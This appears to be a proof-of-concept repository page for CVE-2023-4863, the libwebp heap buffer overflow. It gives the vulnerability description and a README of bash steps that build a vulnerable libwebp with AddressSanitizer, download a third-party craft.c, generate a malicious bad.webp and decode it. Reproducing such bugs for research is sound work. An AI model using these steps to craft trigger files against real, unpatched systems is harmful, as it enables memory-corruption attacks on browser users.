CVE-2023-4863 PoC — Google Chrome buffer error vulnerability

Source
Associated Vulnerability
Title: Google Chrome buffer error vulnerability (CVE-2023-4863)
Description:Heap buffer overflow in libwebp in Google Chrome prior to 116.0.5845.187 and libwebp 1.3.2 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: Critical)
Readme
# CVE-2023-4863
```bash
# clone libwebp
git clone https://chromium.googlesource.com/webm/libwebp/ webp_test
cd webp_test/
# check out the vulnerable version
git checkout 7ba44f80f3b94fc0138db159afea770ef06532a0
# enable AddressSanitizer
sed -i 's/^EXTRA_FLAGS=.*/& -fsanitize=address/' makefile.unix
# build libwebp and its example tools
make -f makefile.unix
cd examples/
# fetch mistymntncop's proof-of-concept code
wget https://raw.githubusercontent.com/mistymntncop/CVE-2023-4863/main/craft.c
# build the proof-of-concept and generate the trigger file
gcc -o craft craft.c
./craft bad.webp
# decode the trigger file with the ASan-instrumented dwebp
./dwebp bad.webp -o test.png
```
File Snapshot

[4.0K] /data/pocs/f2e7238768369e32e1d479d9e1109396148ed08f
├── [ 57K] my.log
├── [ 605] README.md
├── [4.3M] video.webm
└── [4.0K] webp_test

1 directory, 3 files